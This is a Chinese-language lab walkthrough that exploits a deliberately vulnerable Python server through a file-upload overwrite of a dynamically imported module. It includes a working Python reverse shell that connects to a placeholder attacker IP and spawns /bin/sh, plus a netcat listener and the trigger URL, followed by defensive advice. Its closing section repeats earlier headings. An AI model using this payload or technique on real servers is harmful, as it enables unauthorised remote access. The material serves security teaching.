通过Directory Listing漏洞获取服务器权限的渗透测试教学<\/h1>

0x00 漏洞环境概述<\/h2>
本教学基于一个存在Directory Listing漏洞的Python服务器环境，通过分析服务器代码和功能接口，最终实现服务器权限获取的全过程。<\/p>

环境搭建<\/h3>

使用Docker搭建漏洞环境：<\/li> <\/ol>

git clone https:\/\/github.com\/b1ngz\/vul-py-server.git
<\/span><\/span>cd vul-py-server
<\/span><\/span>docker build -t vul-py-server .
<\/span><\/span>docker run -d --name=<\/span>vul-py -p 127.0.0.1:30000:9080 vul-py-server
<\/span><\/span><\/code><\/pre>
环境包含的主要文件：<\/li>
<\/ol>

httpServer.py<\/code>：核心服务器代码(Python2 SimpleHTTPServer)<\/li>
log.txt<\/code>：服务器输出日志<\/li>
showDump.py<\/code>：被导入的Python模块<\/li>
upload.html<\/code>：文件上传页面<\/li>
<\/ul>
0x01 服务器接口分析<\/h2>
1. GET \/reload<\/h3>

功能：执行server_path\/bin\/update_and_reload.sh<\/code>脚本<\/li>
代码关键点：<\/li>
<\/ul>
fileObj =<\/span> os.<\/span>popen('sh <\/span>%s<\/span> bin\/update_and_reload.sh 2>&1'<\/span> %<\/span> (server_path,))
<\/span><\/span><\/code><\/pre>2. GET \/real_time_log?<\/h3>

功能：读取server_path\/log\/log.{logName}<\/code>文件内容<\/li>
代码关键点：<\/li>
<\/ul>
logName =<\/span> self.<\/span>path.<\/span>split('='<\/span>)[1<\/span>]
<\/span><\/span>finename =<\/span> server_path +<\/span> 'log\/log.'<\/span> +<\/span> logName
<\/span><\/span>fileobj =<\/span> open(finename)
<\/span><\/span><\/code><\/pre>3. GET \/del_file_list?<\/h3>

功能：列出指定目录下的文件<\/li>
代码关键点：<\/li>
<\/ul>
currpath =<\/span> self.<\/span>path[self.<\/span>path.<\/span>index("?"<\/span>)+<\/span>1<\/span>:]
<\/span><\/span>absCurrPath =<\/span> os.<\/span>path.<\/span>join(WorkDir, currpath)
<\/span><\/span>itemlist =<\/span> os.<\/span>listdir(absCurrPath)
<\/span><\/span><\/code><\/pre>4. GET \/del_file?<\/h3>

功能：删除指定文件或目录<\/li>
代码关键点：<\/li>
<\/ul>
currpath =<\/span> self.<\/span>path[self.<\/span>path.<\/span>index("?"<\/span>)+<\/span>1<\/span>:]
<\/span><\/span>absCurrPath =<\/span> os.<\/span>path.<\/span>join(WorkDir, currpath)
<\/span><\/span>os.<\/span>remove(absCurrPath)  # 或 os.rmdir(absCurrPath)<\/span>
<\/span><\/span><\/code><\/pre>5. GET \/show_dump<\/h3>

功能：动态导入并执行showDump.py<\/code>中的函数<\/li>
代码关键点：<\/li>
<\/ul>
from<\/span> showDump import<\/span> show_dump
<\/span><\/span>show_dump('hello'<\/span>, 'world'<\/span>)
<\/span><\/span><\/code><\/pre>6. POST \/upload.html<\/h3>

功能：文件上传接口<\/li>
代码关键点：<\/li>
<\/ul>
filename =<\/span> form['fname'<\/span>].<\/span>filename
<\/span><\/span>savename =<\/span> form['newname'<\/span>].<\/span>value if<\/span> 'newname'<\/span> in<\/span> form else<\/span> filename
<\/span><\/span>filepath =<\/span> os.<\/span>path.<\/span>join(path, savename)
<\/span><\/span>savefile =<\/span> open(filepath, 'wb'<\/span>)
<\/span><\/span>savefile.<\/span>write(filedata)
<\/span><\/span><\/code><\/pre>0x02 漏洞利用思路分析<\/h2>
初始评估<\/h3>

权限限制：<\/li>
<\/ol>

当前用户为www<\/code><\/li>
\/home\/dev\/<\/code>目录属于dev<\/code>用户，www<\/code>无写权限<\/li>
<\/ul>

可利用点：<\/li>
<\/ol>

文件上传功能（路径和文件名可控）<\/li>
动态导入Python模块功能<\/li>
文件删除和目录遍历功能<\/li>
<\/ul>
尝试过的利用方式<\/h3>

覆盖shell脚本<\/strong>：<\/li>
<\/ol>

尝试覆盖\/home\/dev\/bin\/update_and_reload.sh<\/code><\/li>
失败原因：权限不足(Permission denied<\/code>)<\/li>
<\/ul>

路径遍历读取文件<\/strong>：<\/li>
<\/ol>

尝试通过\/real_time_log?<\/code>接口读取系统文件<\/li>
失败原因：路径拼接方式限制，无法使用..\/<\/code>遍历<\/li>
<\/ul>

覆盖主服务器文件<\/strong>：<\/li>
<\/ol>

尝试覆盖httpServer.py<\/code><\/li>
失败原因：代码已加载到内存，需要重启才能生效<\/li>
<\/ul>
成功利用方式：覆盖Python模块<\/h3>

利用点：<\/li>
<\/ol>

\/show_dump<\/code>接口每次请求都会重新导入showDump.py<\/code><\/li>
上传功能可以覆盖showDump.py<\/code>文件<\/li>
<\/ul>

关键优势：<\/li>
<\/ol>

动态导入机制允许热更新模块<\/li>
保持函数签名不变，内部代码可任意修改<\/li>
<\/ul>
0x03 漏洞利用步骤<\/h2>
1. 准备恶意Python模块<\/h3>
创建showDump.py<\/code>反弹shell代码：<\/p>
# -*- coding: utf-8 -*-<\/span>
<\/span><\/span>import<\/span> os
<\/span><\/span>import<\/span> socket
<\/span><\/span>import<\/span> subprocess
<\/span><\/span>
<\/span><\/span>ip =<\/span> "攻击者IP"<\/span>
<\/span><\/span>port =<\/span> 12345<\/span>
<\/span><\/span>
<\/span><\/span>def<\/span> show_dump<\/span>(dumpWorkDir, dumpfile):
<\/span><\/span>    s =<\/span> socket.<\/span>socket(socket.<\/span>AF_INET, socket.<\/span>SOCK_STREAM)
<\/span><\/span>    s.<\/span>connect((ip, port))
<\/span><\/span>    os.<\/span>dup2(s.<\/span>fileno(), 0<\/span>)
<\/span><\/span>    os.<\/span>dup2(s.<\/span>fileno(), 1<\/span>)
<\/span><\/span>    os.<\/span>dup2(s.<\/span>fileno(), 2<\/span>)
<\/span><\/span>    p =<\/span> subprocess.<\/span>call(["\/bin\/sh"<\/span>, "-i"<\/span>])
<\/span><\/span><\/code><\/pre>2. 上传恶意文件<\/h3>
通过upload.html<\/code>上传文件：<\/p>

选择准备好的showDump.py<\/code>文件<\/li>
在"newname"字段填写showDump.py<\/code>（覆盖原文件）<\/li>
<\/ul>
3. 设置监听<\/h3>
在攻击机器上设置netcat监听：<\/p>
nc -v -l 12345<\/span>
<\/span><\/span><\/code><\/pre>4. 触发执行<\/h3>
访问\/show_dump<\/code>接口触发恶意代码执行：<\/p>
http:\/\/127.0.0.1:30000\/show_dump
<\/code><\/pre>
5. 获取shell<\/h3>
成功获取反向shell连接：<\/p>
$ id
uid=1000(www) gid=1000(www) groups=1000(www)
$ ls -lh \/home\/www\/code
<\/code><\/pre>
0x04 防御建议<\/h2>

目录列表<\/strong>：<\/li>
<\/ol>

禁用Directory Listing功能<\/li>
使用索引文件(index.html)替代<\/li>
<\/ul>

文件上传<\/strong>：<\/li>
<\/ol>

限制上传文件类型<\/li>
设置上传目录不可执行<\/li>
对上传文件重命名<\/li>
<\/ul>

动态导入<\/strong>：<\/li>
<\/ol>

避免使用动态导入用户可控文件<\/li>
如需动态加载，应进行严格校验<\/li>
<\/ul>

权限控制<\/strong>：<\/li>
<\/ol>

遵循最小权限原则<\/li>
服务运行用户不应有敏感目录写权限<\/li>
<\/ul>

路径处理<\/strong>：<\/li>
<\/ol>

规范化所有路径处理<\/li>
防止目录遍历攻击<\/li>
<\/ul>

日志监控<\/strong>：<\/li>
<\/ol>

监控异常文件修改行为<\/li>
记录所有文件上传和删除操作<\/li>
<\/ul>
0x05 总结<\/h2>
本案例展示了如何通过Directory Listing漏洞发现服务器敏感文件，分析服务器功能接口，最终利用文件上传和动态导入机制获取服务器权限。关键在于：<\/p>

全面分析服务器暴露的功能接口<\/li>
理解服务器的工作机制和权限模型<\/li>
找到可利用的动态代码执行点<\/li>
构造精确的利用代码绕过限制<\/li>
<\/ol>
这种攻击方式虽然技术难度不高，但非常有效，提醒开发人员需要重视基础安全配置和权限管理。<\/p>

通过Directory Listing漏洞获取服务器权限的渗透测试教学<\/h1>

0x00 漏洞环境概述<\/h2> 本教学基于一个存在Directory Listing漏洞的Python服务器环境，通过分析服务器代码和功能接口，最终实现服务器权限获取的全过程。<\/p>

0x01 服务器接口分析<\/h2>

0x02 漏洞利用思路分析<\/h2>

0x03 漏洞利用步骤<\/h2>

0x00 漏洞环境概述<\/h2>
本教学基于一个存在Directory Listing漏洞的Python服务器环境，通过分析服务器代码和功能接口，最终实现服务器权限获取的全过程。<\/p>